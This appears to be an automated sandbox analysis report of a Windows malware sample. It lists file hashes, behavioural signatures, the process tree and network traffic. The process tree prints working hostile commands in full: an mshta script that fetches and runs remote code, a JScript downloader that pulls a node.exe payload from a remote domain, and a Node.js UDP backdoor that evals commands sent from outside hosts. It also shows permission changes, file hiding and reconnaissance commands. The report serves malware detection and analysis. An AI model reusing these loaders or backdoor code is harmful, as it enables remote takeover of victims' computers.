Analysis
-
max time kernel
149s -
max time network
181s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
11-07-2021 14:17
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210711-154344.exe
Resource
win7v20210410
General
-
Target
usfive_20210711-154344.exe
-
Size
3KB
-
MD5
15467567c301ef6ae8b98d4fafb6db67
-
SHA1
9884574ad77b49580ab14047342b4580324cb6ee
-
SHA256
9db5c02ac4e161369160fe13719a212e55377dd57ffc9f98b7141bce3b9df26c
-
SHA512
5b3d68e59a908312a8e009d2b6ec4af06be67ee7a762d996ed914de9c00bf5edd57dd38f8eaac52bff5ff8a42e7760b7503b517c671bffc37bb55327b37382b1
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 1992 mshta.exe 5 1536 cscript.exe -
Executes dropped EXE 1 IoCs
pid Process 396 node.exe -
Loads dropped DLL 1 IoCs
pid Process 516 cscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 924 icacls.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 972 tasklist.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 564 ipconfig.exe 1028 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1660 systeminfo.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\58ed5ac6d082af38:ads node.exe File created C:\ProgramData\DNTException\node.exe:9192f1584e4fd0248a3a2d7b299fc459 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 396 node.exe 396 node.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 972 tasklist.exe Token: SeIncreaseQuotaPrivilege 864 wmic.exe Token: SeSecurityPrivilege 864 wmic.exe Token: SeTakeOwnershipPrivilege 864 wmic.exe Token: SeLoadDriverPrivilege 864 wmic.exe Token: SeSystemProfilePrivilege 864 wmic.exe Token: SeSystemtimePrivilege 864 wmic.exe Token: SeProfSingleProcessPrivilege 864 wmic.exe Token: SeIncBasePriorityPrivilege 864 wmic.exe Token: SeCreatePagefilePrivilege 864 wmic.exe Token: SeBackupPrivilege 864 wmic.exe Token: SeRestorePrivilege 864 wmic.exe Token: SeShutdownPrivilege 864 wmic.exe Token: SeDebugPrivilege 864 wmic.exe Token: SeSystemEnvironmentPrivilege 864 wmic.exe Token: SeRemoteShutdownPrivilege 864 wmic.exe Token: SeUndockPrivilege 864 wmic.exe Token: SeManageVolumePrivilege 864 wmic.exe Token: 33 864 wmic.exe Token: 34 864 wmic.exe Token: 35 864 wmic.exe Token: SeIncreaseQuotaPrivilege 864 wmic.exe Token: SeSecurityPrivilege 864 wmic.exe Token: SeTakeOwnershipPrivilege 864 wmic.exe Token: SeLoadDriverPrivilege 864 wmic.exe Token: SeSystemProfilePrivilege 864 wmic.exe Token: SeSystemtimePrivilege 864 wmic.exe Token: SeProfSingleProcessPrivilege 864 wmic.exe Token: SeIncBasePriorityPrivilege 864 wmic.exe Token: SeCreatePagefilePrivilege 864 wmic.exe Token: SeBackupPrivilege 864 wmic.exe Token: SeRestorePrivilege 864 wmic.exe Token: SeShutdownPrivilege 864 wmic.exe Token: SeDebugPrivilege 864 wmic.exe Token: SeSystemEnvironmentPrivilege 864 wmic.exe Token: SeRemoteShutdownPrivilege 864 wmic.exe Token: SeUndockPrivilege 864 wmic.exe Token: SeManageVolumePrivilege 864 wmic.exe Token: 33 864 wmic.exe Token: 34 864 wmic.exe Token: 35 864 wmic.exe Token: SeDebugPrivilege 1028 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe 25 PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe 25 PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe 25 PID 1092 wrote to memory of 1992 1092 usfive_20210711-154344.exe 25 PID 1992 wrote to memory of 1500 1992 mshta.exe 30 PID 1992 wrote to memory of 1500 1992 mshta.exe 30 PID 1992 wrote to memory of 1500 1992 mshta.exe 30 PID 1992 wrote to memory of 1500 1992 mshta.exe 30 PID 1500 wrote to memory of 1536 1500 cmd.exe 32 PID 1500 wrote to memory of 1536 1500 cmd.exe 32 PID 1500 wrote to memory of 1536 1500 cmd.exe 32 PID 1500 wrote to memory of 1536 1500 cmd.exe 32 PID 1500 wrote to memory of 1468 1500 cmd.exe 33 PID 1500 wrote to memory of 1468 1500 cmd.exe 33 PID 1500 wrote to memory of 1468 1500 cmd.exe 33 PID 1500 wrote to memory of 1468 1500 cmd.exe 33 PID 1500 wrote to memory of 516 1500 cmd.exe 34 PID 1500 wrote to memory of 516 1500 cmd.exe 34 PID 1500 wrote to memory of 516 1500 cmd.exe 34 PID 1500 wrote to memory of 516 1500 cmd.exe 34 PID 516 wrote to memory of 396 516 cscript.exe 35 PID 516 wrote to memory of 396 516 cscript.exe 35 PID 516 wrote to memory of 396 516 cscript.exe 35 PID 516 wrote to memory of 396 516 cscript.exe 35 PID 396 wrote to memory of 880 396 node.exe 37 PID 396 wrote to memory of 880 396 node.exe 37 PID 396 wrote to memory of 880 396 node.exe 37 PID 396 wrote to memory of 880 396 node.exe 37 PID 396 wrote to memory of 1592 396 node.exe 38 PID 396 wrote to memory of 1592 396 node.exe 38 PID 396 wrote to memory of 1592 396 node.exe 38 PID 396 wrote to memory of 1592 396 node.exe 38 PID 396 wrote to memory of 924 396 node.exe 39 PID 396 wrote to memory of 924 396 node.exe 39 PID 396 wrote to memory of 924 396 node.exe 39 PID 396 wrote to memory of 924 396 node.exe 39 PID 396 wrote to memory of 1916 396 node.exe 40 PID 396 wrote to memory of 1916 396 node.exe 40 PID 396 wrote to memory of 1916 396 node.exe 40 PID 396 wrote to memory of 1916 396 node.exe 40 PID 396 wrote to memory of 1768 396 node.exe 41 PID 396 wrote to memory of 1768 396 node.exe 41 PID 396 wrote to memory of 1768 396 node.exe 41 PID 396 wrote to memory of 1768 396 node.exe 41 PID 396 wrote to memory of 972 396 node.exe 42 PID 396 wrote to memory of 972 396 node.exe 42 PID 396 wrote to memory of 972 396 node.exe 42 PID 396 wrote to memory of 972 396 node.exe 42 PID 396 wrote to memory of 864 396 node.exe 44 PID 396 wrote to memory of 864 396 node.exe 44 PID 396 wrote to memory of 864 396 node.exe 44 PID 396 wrote to memory of 864 396 node.exe 44 PID 396 wrote to memory of 564 396 node.exe 45 PID 396 wrote to memory of 564 396 node.exe 45 PID 396 wrote to memory of 564 396 node.exe 45 PID 396 wrote to memory of 564 396 node.exe 45 PID 396 wrote to memory of 592 396 node.exe 46 PID 396 wrote to memory of 592 396 node.exe 46 PID 396 wrote to memory of 592 396 node.exe 46 PID 396 wrote to memory of 592 396 node.exe 46 PID 396 wrote to memory of 1028 396 node.exe 47 PID 396 wrote to memory of 1028 396 node.exe 47 PID 396 wrote to memory of 1028 396 node.exe 47 PID 396 wrote to memory of 1028 396 node.exe 47 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1916 attrib.exe 1768 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();184;y=unescape('%325%31%7E%68t%74p%3A%2F%2Fl%751%2Ea%73i%61%2F%68r%69%2F%3F2%31a%36e%34b%7E3%34').split('~');29;try{x='WinHttp';55;x=new ActiveXObject(x+'.'+x+'Request.5.1');187;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);165;x.send();220;y='ipt.S';191;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);204;}catch(e){};30;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab & expand node.cab node.exe & del get1626014142501.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626014142501.txt3⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab4⤵
- Blocklisted process makes network request
PID:1536
-
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
PID:1468
-
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:516 -
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵PID:880
-
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵PID:1592
-
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
PID:924
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
PID:1916
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
PID:1768
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
PID:564
-
-
C:\Windows\SysWOW64\route.exeroute.exe print6⤵PID:592
-
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
PID:1660
-
-
-
-
-
Network
-
Remote address:8.8.8.8:53Requestlu1.asiaIN AResponselu1.asiaIN A5.188.206.211
-
GEThttp://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29mshta.exeRemote address:5.188.206.211:80RequestGET /hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: lu1.asia
ResponseHTTP/1.1 200 OK
Server: Caddy
X-Powered-By: PHP/7.3.25
Date: Sun, 11 Jul 2021 14:35:42 GMT
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestasu02.shopIN AResponseasu02.shopIN A5.188.206.211
-
Remote address:5.188.206.211:80RequestGET /hri/?2fee0e72c&b=fa1d848c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: asu02.shop
ResponseHTTP/1.1 200 OK
Server: Caddy
X-Powered-By: PHP/7.3.25
Date: Sun, 11 Jul 2021 14:35:43 GMT
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestasu00.xyzIN AResponseasu00.xyzIN A5.188.206.211
-
Remote address:8.8.8.8:53Requestlu0.viewdns.netIN AResponse
-
5.188.206.211:80http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29httpmshta.exe655 B 2.6kB 5 4
HTTP Request
GET http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29HTTP Response
200 -
37.2kB 2.3MB 805 1564
HTTP Request
GET http://asu02.shop/hri/?2fee0e72c&b=fa1d848cHTTP Response
200
-
54 B 70 B 1 1
DNS Request
lu1.asia
DNS Response
5.188.206.211
-
56 B 72 B 1 1
DNS Request
asu02.shop
DNS Response
5.188.206.211
-
55 B 71 B 1 1
DNS Request
asu00.xyz
DNS Response
5.188.206.211
-
61 B 121 B 1 1
DNS Request
lu0.viewdns.net
-
20.2kB 33.2kB 156 145